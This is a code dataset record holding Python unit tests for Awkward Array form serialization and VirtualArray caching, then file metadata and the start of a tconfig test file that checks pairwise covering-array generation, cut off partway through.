"class": "BitMaskedArray",
"mask": "i8",
"content": {
"class": "NumpyArray",
"inner_shape": [],
"itemsize": 8,
"format": "d",
"primitive": "float64",
"has_identities": False,
"parameters": {},
"form_key": None,
},
"valid_when": True,
"lsb_order": False,
"has_identities": False,
"parameters": {"hey": ["you"]},
"form_key": "yowzers",
}
assert json.loads(str(form)) == {
"class": "BitMaskedArray",
"mask": "i8",
"content": "float64",
"valid_when": True,
"lsb_order": False,
"parameters": {"hey": ["you"]},
"form_key": "yowzers",
}
assert form.mask == "i8"
assert json.loads(str(form.content)) == {
"class": "NumpyArray",
"itemsize": 8,
"format": "d",
"primitive": "float64",
}
assert form.valid_when is True
assert form.lsb_order is False
assert form.has_identities is False
assert form.parameters == {"hey": ["you"]}
assert form.parameter("hey") == ["you"]
assert form.form_key == "yowzers"
form = ak.forms.ByteMaskedForm(
"i8",
ak.forms.NumpyForm([], 8, "d"),
True,
parameters={"hey": ["you"]},
form_key="yowzers",
)
assert form == form
assert pickle.loads(pickle.dumps(form, -1)) == form
assert ak.forms.Form.fromjson(form.tojson(False, False)) == form
assert ak.forms.Form.fromjson(form.tojson(False, True)) == form
assert json.loads(form.tojson(False, True)) == {
"class": "ByteMaskedArray",
"mask": "i8",
"content": {
"class": "NumpyArray",
"inner_shape": [],
"itemsize": 8,
"format": "d",
"primitive": "float64",
"has_identities": False,
"parameters": {},
"form_key": None,
},
"valid_when": True,
"has_identities": False,
"parameters": {"hey": ["you"]},
"form_key": "yowzers",
}
assert json.loads(str(form)) == {
"class": "ByteMaskedArray",
"mask": "i8",
"content": "float64",
"valid_when": True,
"parameters": {"hey": ["you"]},
"form_key": "yowzers",
}
assert form.mask == "i8"
assert json.loads(str(form.content)) == {
"class": "NumpyArray",
"itemsize": 8,
"format": "d",
"primitive": "float64",
}
assert form.valid_when is True
assert form.has_identities is False
assert form.parameters == {"hey": ["you"]}
assert form.parameter("hey") == ["you"]
assert form.form_key == "yowzers"
form = ak.forms.EmptyForm(parameters={"hey": ["you"]}, form_key="yowzers")
assert form == form
assert pickle.loads(pickle.dumps(form, -1)) == form
assert ak.forms.Form.fromjson(form.tojson(False, False)) == form
assert ak.forms.Form.fromjson(form.tojson(False, True)) == form
assert json.loads(form.tojson(False, True)) == {
"class": "EmptyArray",
"has_identities": False,
"parameters": {"hey": ["you"]},
"form_key": "yowzers",
}
assert json.loads(str(form)) == {
"class": "EmptyArray",
"parameters": {"hey": ["you"]},
"form_key": "yowzers",
}
assert form.has_identities is False
assert form.parameters == {"hey": ["you"]}
assert form.parameter("hey") == ["you"]
assert form.form_key == "yowzers"
form = ak.forms.IndexedForm(
"i64",
ak.forms.NumpyForm([], 8, "d"),
parameters={"hey": ["you"]},
form_key="yowzers",
)
assert form == form
assert pickle.loads(pickle.dumps(form, -1)) == form
assert ak.forms.Form.fromjson(form.tojson(False, False)) == form
assert ak.forms.Form.fromjson(form.tojson(False, True)) == form
assert json.loads(form.tojson(False, True)) == {
"class": "IndexedArray64",
"index": "i64",
"content": {
"class": "NumpyArray",
"inner_shape": [],
"itemsize": 8,
"format": "d",
"primitive": "float64",
"has_identities": False,
"parameters": {},
"form_key": None,
},
"has_identities": False,
"parameters": {"hey": ["you"]},
"form_key": "yowzers",
}
assert json.loads(str(form)) == {
"class": "IndexedArray64",
"index": "i64",
"content": "float64",
"parameters": {"hey": ["you"]},
"form_key": "yowzers",
}
assert form.index == "i64"
assert json.loads(str(form.content)) == {
"class": "NumpyArray",
"itemsize": 8,
"format": "d",
"primitive": "float64",
}
assert form.has_identities is False
assert form.parameters == {"hey": ["you"]}
assert form.parameter("hey") == ["you"]
assert form.form_key == "yowzers"
form = ak.forms.IndexedOptionForm(
"i64",
ak.forms.NumpyForm([], 8, "d"),
parameters={"hey": ["you"]},
form_key="yowzers",
)
assert form == form
assert pickle.loads(pickle.dumps(form, -1)) == form
assert ak.forms.Form.fromjson(form.tojson(False, False)) == form
assert ak.forms.Form.fromjson(form.tojson(False, True)) == form
assert json.loads(form.tojson(False, True)) == {
"class": "IndexedOptionArray64",
"index": "i64",
"content": {
"class": "NumpyArray",
"inner_shape": [],
"itemsize": 8,
"format": "d",
"primitive": "float64",
"has_identities": False,
"parameters": {},
"form_key": None,
},
"has_identities": False,
"parameters": {"hey": ["you"]},
"form_key": "yowzers",
}
assert json.loads(str(form)) == {
"class": "IndexedOptionArray64",
"index": "i64",
"content": "float64",
"parameters": {"hey": ["you"]},
"form_key": "yowzers",
}
assert form.index == "i64"
assert json.loads(str(form.content)) == {
"class": "NumpyArray",
"itemsize": 8,
"format": "d",
"primitive": "float64",
}
assert form.has_identities is False
assert form.parameters == {"hey": ["you"]}
assert form.parameter("hey") == ["you"]
assert form.form_key == "yowzers"
form = ak.forms.ListForm(
"i64",
"i64",
ak.forms.NumpyForm([], 8, "d"),
parameters={"hey": ["you"]},
form_key="yowzers",
)
assert form == form
assert pickle.loads(pickle.dumps(form, -1)) == form
assert ak.forms.Form.fromjson(form.tojson(False, False)) == form
assert ak.forms.Form.fromjson(form.tojson(False, True)) == form
assert json.loads(form.tojson(False, True)) == {
"class": "ListArray64",
"starts": "i64",
"stops": "i64",
"content": {
"class": "NumpyArray",
"inner_shape": [],
"itemsize": 8,
"format": "d",
"primitive": "float64",
"has_identities": False,
"parameters": {},
"form_key": None,
},
"has_identities": False,
"parameters": {"hey": ["you"]},
"form_key": "yowzers",
}
assert json.loads(str(form)) == {
"class": "ListArray64",
"starts": "i64",
"stops": "i64",
"content": "float64",
"parameters": {"hey": ["you"]},
"form_key": "yowzers",
}
assert form.starts == "i64"
assert form.stops == "i64"
assert json.loads(str(form.content)) == {
"class": "NumpyArray",
"itemsize": 8,
"format": "d",
"primitive": "float64",
}
assert form.has_identities is False
assert form.parameters == {"hey": ["you"]}
assert form.parameter("hey") == ["you"]
assert form.form_key == "yowzers"
form = ak.forms.ListOffsetForm(
"i64",
ak.forms.NumpyForm([], 8, "d"),
parameters={"hey": ["you"]},
form_key="yowzers",
)
assert form == form
assert pickle.loads(pickle.dumps(form, -1)) == form
assert ak.forms.Form.fromjson(form.tojson(False, False)) == form
assert ak.forms.Form.fromjson(form.tojson(False, True)) == form
assert json.loads(form.tojson(False, True)) == {
"class": "ListOffsetArray64",
"offsets": "i64",
"content": {
"class": "NumpyArray",
"inner_shape": [],
"itemsize": 8,
"format": "d",
"primitive": "float64",
"has_identities": False,
"parameters": {},
"form_key": None,
},
"has_identities": False,
"parameters": {"hey": ["you"]},
"form_key": "yowzers",
}
assert json.loads(str(form)) == {
"class": "ListOffsetArray64",
"offsets": "i64",
"content": "float64",
"parameters": {"hey": ["you"]},
"form_key": "yowzers",
}
assert form.offsets == "i64"
assert json.loads(str(form.content)) == {
"class": "NumpyArray",
"itemsize": 8,
"format": "d",
"primitive": "float64",
}
assert form.has_identities is False
assert form.parameters == {"hey": ["you"]}
assert form.parameter("hey") == ["you"]
assert form.form_key == "yowzers"
form = ak.forms.RecordForm(
{"one": ak.forms.NumpyForm([], 8, "d"), "two": ak.forms.NumpyForm([], 1, "?")},
parameters={"hey": ["you"]},
form_key="yowzers",
)
assert form == form
assert pickle.loads(pickle.dumps(form, -1)) == form
assert ak.forms.Form.fromjson(form.tojson(False, False)) == form
assert ak.forms.Form.fromjson(form.tojson(False, True)) == form
assert json.loads(form.tojson(False, True)) == {
"class": "RecordArray",
"contents": {
"one": {
"class": "NumpyArray",
"inner_shape": [],
"itemsize": 8,
"format": "d",
"primitive": "float64",
"has_identities": False,
"parameters": {},
"form_key": None,
},
"two": {
"class": "NumpyArray",
"inner_shape": [],
"itemsize": 1,
"format": "?",
"primitive": "bool",
"has_identities": False,
"parameters": {},
"form_key": None,
},
},
"has_identities": False,
"parameters": {"hey": ["you"]},
"form_key": "yowzers",
}
assert json.loads(str(form)) == {
"class": "RecordArray",
"contents": {"one": "float64", "two": "bool"},
"parameters": {"hey": ["you"]},
"form_key": "yowzers",
}
assert [json.loads(str(x)) for x in form.values()] == [
{
"class": "NumpyArray",
"itemsize": 8,
"format": "d",
"primitive": "float64",
},
{"class": "NumpyArray", "itemsize": 1, "format": "?", "primitive": "bool"},
]
assert {n: json.loads(str(x)) for n, x in form.contents.items()} == {
"one": {
"class": "NumpyArray",
"itemsize": 8,
"format": "d",
"primitive": "float64",
},
"two": {
"class": "NumpyArray",
"itemsize": 1,
"format": "?",
"primitive": "bool",
},
}
assert json.loads(str(form.content("one"))) == {
"class": "NumpyArray",
"itemsize": 8,
"format": "d",
"primitive": "float64",
}
assert json.loads(str(form.content("two"))) == {
"class": "NumpyArray",
"itemsize": 1,
"format": "?",
"primitive": "bool",
}
assert json.loads(str(form.content(0))) == {
"class": "NumpyArray",
"itemsize": 8,
"format": "d",
"primitive": "float64",
}
assert json.loads(str(form.content(1))) == {
"class": "NumpyArray",
"itemsize": 1,
"format": "?",
"primitive": "bool",
}
assert form.has_identities is False
assert form.parameters == {"hey": ["you"]}
assert form.parameter("hey") == ["you"]
assert form.form_key == "yowzers"
form = ak.forms.RecordForm(
[ak.forms.NumpyForm([], 8, "d"), ak.forms.NumpyForm([], 1, "?")],
parameters={"hey": ["you"]},
form_key="yowzers",
)
assert form == form
assert pickle.loads(pickle.dumps(form, -1)) == form
assert ak.forms.Form.fromjson(form.tojson(False, False)) == form
assert ak.forms.Form.fromjson(form.tojson(False, True)) == form
assert json.loads(form.tojson(False, True)) == {
"class": "RecordArray",
"contents": [
{
"class": "NumpyArray",
"inner_shape": [],
"itemsize": 8,
"format": "d",
"primitive": "float64",
"has_identities": False,
"parameters": {},
"form_key": None,
},
{
"class": "NumpyArray",
"inner_shape": [],
"itemsize": 1,
"format": "?",
"primitive": "bool",
"has_identities": False,
"parameters": {},
"form_key": None,
},
],
"has_identities": False,
"parameters": {"hey": ["you"]},
"form_key": "yowzers",
}
assert json.loads(str(form)) == {
"class": "RecordArray",
"contents": ["float64", "bool"],
"parameters": {"hey": ["you"]},
"form_key": "yowzers",
}
assert [json.loads(str(x)) for x in form.values()] == [
{"class": "NumpyArray", "itemsize": 8, "format": "d", "primitive": "float64"},
{"class": "NumpyArray", "itemsize": 1, "format": "?", "primitive": "bool"},
]
assert {n: json.loads(str(x)) for n, x in form.contents.items()} == {
"0": {
"class": "NumpyArray",
"itemsize": 8,
"format": "d",
"primitive": "float64",
},
"1": {"class": "NumpyArray", "itemsize": 1, "format": "?", "primitive": "bool"},
}
assert json.loads(str(form.content(0))) == {
"class": "NumpyArray",
"itemsize": 8,
"format": "d",
"primitive": "float64",
}
assert json.loads(str(form.content(1))) == {
"class": "NumpyArray",
"itemsize": 1,
"format": "?",
"primitive": "bool",
}
assert json.loads(str(form.content("0"))) == {
"class": "NumpyArray",
"itemsize": 8,
"format": "d",
"primitive": "float64",
}
assert json.loads(str(form.content("1"))) == {
"class": "NumpyArray",
"itemsize": 1,
"format": "?",
"primitive": "bool",
}
assert form.has_identities is False
assert form.parameters == {"hey": ["you"]}
assert form.parameter("hey") == ["you"]
assert form.form_key == "yowzers"
form = ak.forms.RegularForm(
ak.forms.NumpyForm([], 8, "d"),
10,
parameters={"hey": ["you"]},
form_key="yowzers",
)
assert form == form
assert pickle.loads(pickle.dumps(form, -1)) == form
assert ak.forms.Form.fromjson(form.tojson(False, False)) == form
assert ak.forms.Form.fromjson(form.tojson(False, True)) == form
assert json.loads(form.tojson(False, True)) == {
"class": "RegularArray",
"content": {
"class": "NumpyArray",
"inner_shape": [],
"itemsize": 8,
"format": "d",
"primitive": "float64",
"has_identities": False,
"parameters": {},
"form_key": None,
},
"size": 10,
"has_identities": False,
"parameters": {"hey": ["you"]},
"form_key": "yowzers",
}
assert json.loads(str(form)) == {
"class": "RegularArray",
"content": "float64",
"size": 10,
"parameters": {"hey": ["you"]},
"form_key": "yowzers",
}
assert json.loads(str(form.content)) == {
"class": "NumpyArray",
"itemsize": 8,
"format": "d",
"primitive": "float64",
}
assert form.size == 10
assert form.has_identities is False
assert form.parameters == {"hey": ["you"]}
assert form.parameter("hey") == ["you"]
assert form.form_key == "yowzers"
form = ak.forms.UnionForm(
"i8",
"i64",
[ak.forms.NumpyForm([], 8, "d"), ak.forms.NumpyForm([], 1, "?")],
parameters={"hey": ["you"]},
form_key="yowzers",
)
assert form == form
assert pickle.loads(pickle.dumps(form, -1)) == form
assert ak.forms.Form.fromjson(form.tojson(False, False)) == form
assert ak.forms.Form.fromjson(form.tojson(False, True)) == form
assert json.loads(form.tojson(False, True)) == {
"class": "UnionArray8_64",
"tags": "i8",
"index": "i64",
"contents": [
{
"class": "NumpyArray",
"inner_shape": [],
"itemsize": 8,
"format": "d",
"primitive": "float64",
"has_identities": False,
"parameters": {},
"form_key": None,
},
{
"class": "NumpyArray",
"inner_shape": [],
"itemsize": 1,
"format": "?",
"primitive": "bool",
"has_identities": False,
"parameters": {},
"form_key": None,
},
],
"has_identities": False,
"parameters": {"hey": ["you"]},
"form_key": "yowzers",
}
assert json.loads(str(form)) == {
"class": "UnionArray8_64",
"tags": "i8",
"index": "i64",
"contents": ["float64", "bool"],
"parameters": {"hey": ["you"]},
"form_key": "yowzers",
}
assert form.tags == "i8"
assert form.index == "i64"
assert json.loads(str(form.contents)) == [
{"class": "NumpyArray", "itemsize": 8, "format": "d", "primitive": "float64"},
{"class": "NumpyArray", "itemsize": 1, "format": "?", "primitive": "bool"},
]
assert json.loads(str(form.content(0))) == {
"class": "NumpyArray",
"itemsize": 8,
"format": "d",
"primitive": "float64",
}
assert json.loads(str(form.content(1))) == {
"class": "NumpyArray",
"itemsize": 1,
"format": "?",
"primitive": "bool",
}
assert form.has_identities is False
assert form.parameters == {"hey": ["you"]}
assert form.parameter("hey") == ["you"]
assert form.form_key == "yowzers"
form = ak.forms.UnmaskedForm(
ak.forms.NumpyForm([], 8, "d"), parameters={"hey": ["you"]}, form_key="yowzers"
)
assert form == form
assert pickle.loads(pickle.dumps(form, -1)) == form
assert ak.forms.Form.fromjson(form.tojson(False, False)) == form
assert ak.forms.Form.fromjson(form.tojson(False, True)) == form
assert json.loads(form.tojson(False, True)) == {
"class": "UnmaskedArray",
"content": {
"class": "NumpyArray",
"inner_shape": [],
"itemsize": 8,
"format": "d",
"primitive": "float64",
"has_identities": False,
"parameters": {},
"form_key": None,
},
"has_identities": False,
"parameters": {"hey": ["you"]},
"form_key": "yowzers",
}
assert json.loads(str(form)) == {
"class": "UnmaskedArray",
"content": "float64",
"parameters": {"hey": ["you"]},
"form_key": "yowzers",
}
assert json.loads(str(form.content)) == {
"class": "NumpyArray",
"itemsize": 8,
"format": "d",
"primitive": "float64",
}
assert form.has_identities is False
assert form.parameters == {"hey": ["you"]}
assert form.parameter("hey") == ["you"]
assert form.form_key == "yowzers"
form = ak.forms.VirtualForm(ak.forms.NumpyForm([], 8, "d"), True)
assert form == form
assert pickle.loads(pickle.dumps(form, -1)) == form
assert ak.forms.Form.fromjson(form.tojson(False, False)) == form
assert ak.forms.Form.fromjson(form.tojson(False, True)) == form
assert form.form.inner_shape == []
assert form.form.itemsize == 8
assert form.form.primitive == "float64"
assert form.form.has_identities is False
assert form.form.parameters == {}
assert form.has_length is True
assert form.parameters == {}
assert json.loads(form.tojson(False, True)) == {
"class": "VirtualArray",
"form": {
"class": "NumpyArray",
"inner_shape": [],
"itemsize": 8,
"format": "d",
"primitive": "float64",
"has_identities": False,
"parameters": {},
"form_key": None,
},
"has_length": True,
"has_identities": False,
"parameters": {},
"form_key": None,
}
assert json.loads(str(form)) == {
"class": "VirtualArray",
"form": "float64",
"has_length": True,
}
form = ak.forms.VirtualForm(None, False)
assert form == form
assert pickle.loads(pickle.dumps(form, -1)) == form
assert ak.forms.Form.fromjson(form.tojson(False, False)) == form
assert ak.forms.Form.fromjson(form.tojson(False, True)) == form
assert form.form is None
assert form.has_length is False
assert form.parameters == {}
assert json.loads(form.tojson(False, True)) == {
"class": "VirtualArray",
"form": None,
"has_length": False,
"has_identities": False,
"parameters": {},
"form_key": None,
}
assert json.loads(str(form)) == {
"class": "VirtualArray",
"form": None,
"has_length": False,
}
def fcn():
return ak.layout.NumpyArray(np.array([1.1, 2.2, 3.3, 4.4, 5.5]))
def test_basic():
generator = ak.layout.ArrayGenerator(
fcn, form=ak.forms.NumpyForm([], 8, "d"), length=5
)
d = ak._util.MappingProxy({})
cache = ak.layout.ArrayCache(d)
virtualarray = ak.layout.VirtualArray(generator, cache)
assert virtualarray.peek_array is None
assert virtualarray.array is not None
assert ak.to_list(virtualarray.peek_array) == [1.1, 2.2, 3.3, 4.4, 5.5]
assert ak.to_list(virtualarray.array) == [1.1, 2.2, 3.3, 4.4, 5.5]
assert ak.to_list(d[virtualarray.cache_key]) == [1.1, 2.2, 3.3, 4.4, 5.5]
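    # Note (added comment): with ArrayCache(None) there is no backing store;
    # .array still materializes on demand, but nothing is retained, so
    # peek_array remains None afterward, as the asserts below show.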
cache = ak.layout.ArrayCache(None)
virtualarray = ak.layout.VirtualArray(generator, cache)
assert virtualarray.peek_array is None
assert virtualarray.array is not None
assert virtualarray.peek_array is None
assert ak.to_list(virtualarray.array) == [1.1, 2.2, 3.3, 4.4, 5.5]
def test_slice():
generator = ak.layout.ArrayGenerator(
lambda: ak.Array(
[[1.1, 2.2, 3.3, 4.4, 5.5], [6.6, 7.7, 8.8], [100, 200, 300, 400]]
),
length=3,
)
virtualarray = ak.layout.VirtualArray(generator)
assert isinstance(virtualarray, ak.layout.VirtualArray)
sliced = virtualarray[:-1]
assert isinstance(sliced, ak.layout.VirtualArray)
assert isinstance(sliced[1], ak.layout.NumpyArray)
def test_field():
generator = ak.layout.ArrayGenerator(
lambda: ak.Array(
[
{"x": 0.0, "y": []},
{"x": 1.1, "y": [1]},
{"x": 2.2, "y": [2, 2]},
{"x": 3.3, "y": [3, 3, 3]},
]
)
)
virtualarray = ak.layout.VirtualArray(generator)
assert isinstance(virtualarray, ak.layout.VirtualArray)
sliced = virtualarray["y"]
assert isinstance(sliced, ak.layout.VirtualArray)
assert isinstance(sliced[1], ak.layout.NumpyArray)
def test_single_level():
template = ak.Array(
[
[{"x": 0.0, "y": []}, {"x": 1.1, "y": [1]}, {"x": 2.2, "y": [2, 2]}],
[],
[{"x": 3.3, "y": [3, 3, 3]}, {"x": 4.4, "y": [4, 4, 4, 4]}],
]
)
generator = ak.layout.ArrayGenerator(
lambda: template, form=template.layout.form, length=3
)
d = ak._util.MappingProxy({})
cache = ak.layout.ArrayCache(d)
virtualarray = ak.layout.VirtualArray(generator, cache)
a = virtualarray[2]
assert isinstance(a, ak.layout.RecordArray)
assert len(d) == 1
assert ak.to_list(a) == [{"x": 3.3, "y": [3, 3, 3]}, {"x": 4.4, "y": [4, 4, 4, 4]}]
d.clear()
a = virtualarray[1:]
assert isinstance(a, ak.layout.VirtualArray)
assert len(d) == 0
b = a[1]
assert isinstance(b, ak.layout.RecordArray)
assert len(d) >= 1
assert ak.to_list(b) == [{"x": 3.3, "y": [3, 3, 3]}, {"x": 4.4, "y": [4, 4, 4, 4]}]
d.clear()
a = virtualarray[[0, 2, 1, 0]]
assert isinstance(a, ak.layout.VirtualArray)
assert len(d) == 0
b = a[1]
assert isinstance(b, ak.layout.RecordArray)
assert len(d) >= 1
assert ak.to_list(b) == [{"x": 3.3, "y": [3, 3, 3]}, {"x": 4.4, "y": [4, 4, 4, 4]}]
d.clear()
a = virtualarray[[False, True, True]]
assert isinstance(a, ak.layout.VirtualArray)
assert len(d) == 0
b = a[1]
assert isinstance(b, ak.layout.RecordArray)
assert len(d) >= 1
assert ak.to_list(b) == [{"x": 3.3, "y": [3, 3, 3]}, {"x": 4.4, "y": [4, 4, 4, 4]}]
d.clear()
a = virtualarray["x"]
assert isinstance(a, ak.layout.VirtualArray)
assert len(d) == 0
b = a[2]
assert isinstance(b, ak.layout.NumpyArray)
assert len(d) >= 1
assert ak.to_list(b) == [3.3, 4.4]
d.clear()
a = virtualarray["y"]
assert isinstance(a, ak.layout.VirtualArray)
assert len(d) == 0
b = a[2]
assert isinstance(b, (ak.layout.ListArray64, ak.layout.ListOffsetArray64))
assert len(d) >= 1
assert ak.to_list(b) == [[3, 3, 3], [4, 4, 4, 4]]
d.clear()
a = virtualarray[::2, 1]
assert isinstance(a, (ak.layout.RecordArray, ak.layout.IndexedArray64))
assert len(d) >= 1
assert ak.to_list(a) == [{"x": 1.1, "y": [1]}, {"x": 4.4, "y": [4, 4, 4, 4]}]
d.clear()
def test_iter():
generator = ak.layout.ArrayGenerator(
fcn, form=ak.forms.NumpyForm([], 8, "d"), length=5
)
d = ak._util.MappingProxy({})
cache = ak.layout.ArrayCache(d)
virtualarray = ak.layout.VirtualArray(generator, cache)
assert len(d) == 0
it = iter(virtualarray)
assert len(d) == 1
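    # Note (added comment): creating the iterator materializes the array once
    # (one cache entry); iteration then walks the already-materialized data,
    # so clearing the cache afterwards does not trigger re-materialization.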
d.clear()
assert len(d) == 0
assert next(it) == 1.1
assert len(d) == 0
assert list(it) == [2.2, 3.3, 4.4, 5.5]
assert len(d) == 0
def test_nested_virtualness():
counter = [0, 0]
content = ak.layout.NumpyArray(
np.array([0.0, 1.1, 2.2, 3.3, 4.4, 5.5, 6.6, 7.7, 8.8, 9.9])
)
def materialize1():
counter[1] += 1
return content
generator1 = ak.layout.ArrayGenerator(
materialize1, form=content.form, length=len(content)
)
virtual1 = ak.layout.VirtualArray(generator1)
offsets = ak.layout.Index64(np.array([0, 3, 3, 5, 6, 10], dtype=np.int64))
listarray = ak.layout.ListOffsetArray64(offsets, virtual1)
def materialize2():
counter[0] += 1
return listarray
generator2 = ak.layout.ArrayGenerator(
materialize2, form=listarray.form, length=len(listarray)
)
virtual2 = ak.layout.VirtualArray(generator2)
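    # Note (added comment): virtual2 wraps a list whose content is itself
    # virtual, so indexing the outer array materializes only the list
    # structure (counter[0]) while the inner NumpyArray stays unmaterialized
    # (counter[1]) until an element is actually read.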
assert counter == [0, 0]
tmp1 = virtual2[2]
assert isinstance(tmp1, ak.layout.VirtualArray)
assert counter == [1, 0]
tmp2 = tmp1[1]
assert tmp2 == 4.4
assert counter == [1, 1]
def test_highlevel():
array = ak.virtual(lambda: [[1.1, 2.2, 3.3], [], [4.4, 5.5]])
assert isinstance(array.layout, ak.layout.VirtualArray)
assert ak.to_list(array) == [[1.1, 2.2, 3.3], [], [4.4, 5.5]]
counter = [0]
def generate():
counter[0] += 1
return [[1.1, 2.2, 3.3], [], [4.4, 5.5]]
array = ak.virtual(
generate,
length=3,
form={"class": "ListOffsetArray64", "offsets": "i64", "content": "float64"},
)
assert counter[0] == 0
assert len(array) == 3
assert counter[0] == 0
assert str(ak.type(array)) == "3 * var * float64"
assert counter[0] == 0
assert ak.to_list(array[2]) == [4.4, 5.5]
assert counter[0] == 1
| 31.190148
| 88
| 0.515825
| 3,427
| 31,658
| 4.710242
| 0.049898
| 0.06195
| 0.04925
| 0.048321
| 0.896048
| 0.864019
| 0.845496
| 0.82053
| 0.810804
| 0.798228
| 0
| 0.029837
| 0.29705
| 31,658
| 1,014
| 89
| 31.220907
| 0.695515
| 0.003727
| 0
| 0.738854
| 0
| 0
| 0.17739
| 0
| 0
| 0
| 0
| 0
| 0.286624
| 1
| 0.012739
| false
| 0
| 0.005308
| 0.001062
| 0.022293
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 7
| 53c36907bdf7669e712119ed94d341b9de1642fd
| 19,251
| py
| Python
| tconfig/tests/core/algorithms/recursive/test_recursive_gen.py
| awwilliams/tconfig
| e798ca7d85a61c53df07b61440b321dbd3793350
| ["MIT"] | null | null | null
| tconfig/tests/core/algorithms/recursive/test_recursive_gen.py
| awwilliams/tconfig
| e798ca7d85a61c53df07b61440b321dbd3793350
| ["MIT"] | null | null | null
| tconfig/tests/core/algorithms/recursive/test_recursive_gen.py
| awwilliams/tconfig
| e798ca7d85a61c53df07b61440b321dbd3793350
| ["MIT"] | null | null | null |
"""
Created on Sep 30, 2017
@author: Alan Williams
"""
import numpy as np
from tconfig.core.data import DEFAULT_NDARRAY_TYPE, ParameterSet
from tconfig.core.algorithms import RecursiveGenerator
# pylint: disable=invalid-name
def test_generate_configurations():
ps = ParameterSet.create_from_parm_and_value_sizes(13, 3)
gen = RecursiveGenerator(ps, 2)
cs = gen.generate_covering_array()
cs_expected = np.array(
[
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[1, 2, 2, 2, 1, 2, 2, 2, 1, 2, 2, 2, 1],
[1, 3, 3, 3, 1, 3, 3, 3, 1, 3, 3, 3, 1],
[2, 1, 2, 3, 2, 1, 2, 3, 2, 1, 2, 3, 1],
[2, 2, 3, 1, 2, 2, 3, 1, 2, 2, 3, 1, 0],
[2, 3, 1, 2, 2, 3, 1, 2, 2, 3, 1, 2, 0],
[3, 1, 3, 2, 3, 1, 3, 2, 3, 1, 3, 2, 1],
[3, 2, 1, 3, 3, 2, 1, 3, 3, 2, 1, 3, 0],
[3, 3, 2, 1, 3, 3, 2, 1, 3, 3, 2, 1, 0],
[1, 1, 1, 1, 2, 2, 2, 2, 3, 3, 3, 3, 2],
[2, 2, 2, 2, 3, 3, 3, 3, 1, 1, 1, 1, 2],
[3, 3, 3, 3, 1, 1, 1, 1, 2, 2, 2, 2, 2],
[1, 1, 1, 1, 3, 3, 3, 3, 2, 2, 2, 2, 3],
[2, 2, 2, 2, 1, 1, 1, 1, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 2, 2, 2, 2, 1, 1, 1, 1, 3],
],
dtype=DEFAULT_NDARRAY_TYPE,
)
assert np.array_equal(cs, cs_expected)
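# Hedged sketch, not part of the original suite: each cs_expected above is a
# strength-2 covering array, meaning every pair of values for every pair of
# parameters occurs in at least one row. `covers_all_pairs` is a helper name
# introduced here for illustration; it assumes that 0 entries act as
# "don't care" wildcards, which is what the 0s in the expected arrays suggest.
def covers_all_pairs(array, value_sizes):
    ncols = array.shape[1]
    for i in range(ncols):
        for j in range(i + 1, ncols):
            for vi in range(1, value_sizes[i] + 1):
                for vj in range(1, value_sizes[j] + 1):
                    # a row covers (vi, vj) when each column matches the
                    # value or holds the 0 wildcard
                    if not any(
                        row[i] in (0, vi) and row[j] in (0, vj) for row in array
                    ):
                        return False
    return True
# e.g. covers_all_pairs(cs_expected, [3] * 13) should hold for the array above.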
def test_generate_configurations2():
ps = ParameterSet.create_from_parm_and_value_sizes(4, 3)
gen = RecursiveGenerator(ps, 2)
cs = gen.generate_covering_array()
cs_expected = np.array(
[
[1, 1, 1, 1],
[1, 2, 2, 2],
[1, 3, 3, 3],
[2, 1, 2, 3],
[2, 2, 3, 1],
[2, 3, 1, 2],
[3, 1, 3, 2],
[3, 2, 1, 3],
[3, 3, 2, 1],
],
dtype=DEFAULT_NDARRAY_TYPE,
)
assert np.array_equal(cs, cs_expected)
def test_generate_configurations3():
ps = ParameterSet.create_from_parm_and_value_sizes(2, 3)
gen = RecursiveGenerator(ps, 2)
cs = gen.generate_covering_array()
cs_expected = np.array(
[
[1, 1],
[2, 2],
[3, 3],
[2, 3],
[3, 1],
[1, 2],
[3, 2],
[1, 3],
[2, 1],
],
dtype=DEFAULT_NDARRAY_TYPE,
)
assert np.array_equal(cs, cs_expected)
def test_generate_configurations4():
ps = ParameterSet.create_from_value_sizes([2, 3, 2])
gen = RecursiveGenerator(ps, 2)
cs = gen.generate_covering_array()
cs_expected = np.array(
[
[1, 1, 1],
[1, 2, 2],
[2, 1, 2],
[2, 2, 1],
[1, 3, 1],
[2, 3, 2],
],
dtype=DEFAULT_NDARRAY_TYPE,
)
assert np.array_equal(cs, cs_expected)
def test_generate_configurations5():
ps = ParameterSet.create_from_parm_and_value_sizes(8, 2)
gen = RecursiveGenerator(ps, 2)
cs = gen.generate_covering_array()
cs_expected = np.array(
[
[1, 1, 1, 1, 1, 1, 1, 1],
[2, 2, 1, 2, 2, 1, 2, 2],
[1, 2, 2, 1, 2, 2, 1, 2],
[2, 1, 2, 2, 1, 2, 2, 1],
[1, 1, 2, 2, 2, 2, 2, 2],
[2, 2, 1, 1, 1, 2, 2, 2],
[2, 2, 2, 2, 2, 1, 1, 1],
],
dtype=DEFAULT_NDARRAY_TYPE,
)
assert np.array_equal(cs, cs_expected)
def test_generate_configurations6():
ps = ParameterSet.create_from_value_sizes([2, 4, 2, 2])
gen = RecursiveGenerator(ps, 2)
cs = gen.generate_covering_array()
cs_expected = np.array(
[
[1, 1, 1, 1],
[1, 2, 2, 1],
[2, 1, 2, 1],
[2, 2, 1, 0],
[2, 2, 2, 2],
[1, 1, 1, 2],
[1, 3, 1, 1],
[2, 3, 2, 2],
[1, 4, 1, 1],
[2, 4, 2, 2],
],
dtype=DEFAULT_NDARRAY_TYPE,
)
assert np.array_equal(cs, cs_expected)
def test_generate_configurations7():
ps = ParameterSet.create_from_parm_and_value_sizes(4, 6)
gen = RecursiveGenerator(ps, 2)
cs = gen.generate_covering_array()
cs_expected = np.array(
[
[1, 1, 1, 1],
[2, 2, 2, 2],
[3, 3, 3, 3],
[4, 4, 4, 4],
[5, 5, 5, 5],
[6, 6, 6, 6],
[3, 4, 5, 6],
[4, 5, 6, 0],
[5, 6, 0, 1],
[6, 0, 1, 2],
[0, 1, 2, 3],
[1, 2, 3, 4],
[2, 3, 4, 5],
[6, 1, 3, 5],
[0, 2, 4, 6],
[1, 3, 5, 0],
[2, 4, 6, 1],
[3, 5, 0, 2],
[4, 6, 1, 3],
[5, 0, 2, 4],
[2, 5, 1, 4],
